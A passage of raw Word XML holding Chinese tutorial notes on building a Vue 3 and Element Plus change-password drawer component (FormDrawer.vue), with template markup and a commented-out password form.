          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E17B7B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054AD0CA" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22388437" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC1FAC" w14:textId="6D34F99C" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED77DEE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32198595" w14:textId="45644FB9" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import FormDrawer from '~/components/FormDrawer.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122AC1A" w14:textId="7964DC48" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import FormDrawer from '~/components/FormDrawer.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480DB2A1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088AE978" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B4CBA" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const formDrawerRef = ref(null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8E56C" w14:textId="1C2B54E3" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const showDrawer = ref(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF73500" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78131010" w14:textId="06384FD8" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:t>components/FormDrawer.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B99E6A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758E0968" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关于如何将子组件的值暴漏给父组件，需要参考</w:t>
      </w:r>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> defineExpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650BE10D" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://cn.vuejs.org/api/sfc-script-setup.html#defineexpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A7AA8" w14:textId="13C59CBF" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A16054C" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2FDEBF" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46810BE5" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-drawer v-model="showDrawer" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" size="45%" :close-on-click-modal="false"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB2271B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50932B9F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div class="formDrawer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD536C" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;div class="body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697615D9" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;slot&gt;&lt;/slot&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723107D6" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E068D0F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;div class="actions"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E5D14" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-button type="primary"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B259FEF" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;el-button type="default" @click="close"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取消</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D755B3B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39C43E" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A683F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EE1E09" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;!-- &lt;el-form ref="formRef" :model="form" :rules="rules" label-width="80px" size="small"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280347DE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-form-item prop="oldpassword" label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旧密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8C839" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-input v-model="form.oldpassword" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入旧密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55EB81" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04388191" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF5904" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;User /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96B0EA" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0DDF45" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123B20E0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0168FDCE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD85CD" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5462EBA1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-form-item prop="password" label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F662E1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-input v-model="form.password" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" type="password" show-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C3CBD" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F2E0D2" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7C10A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;Lock /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA573EE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D1606" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F22D698" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368F6D12" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37581BF0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A349C34" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-form-item prop="repassword" label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确认密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5964CF" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-input v-model="form.repassword" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" type="password" show-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D44F3" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;template #prefix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CAD965" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02DD98" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;Lock /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FBEB41" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D110D" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0403E7" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21168924" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897E3D8" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760CD764" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B01654" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-button type="primary" @click="onSubmit" :loading="loading"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F559039" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008AB048" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/el-form&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639957E7" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/el-drawer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE1708" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956523D" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9DE12C" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D44E38" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { ref } from "vue"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C99023" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AB67BB" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const showDrawer = ref(false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB742AE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3785ED92" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7C425" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
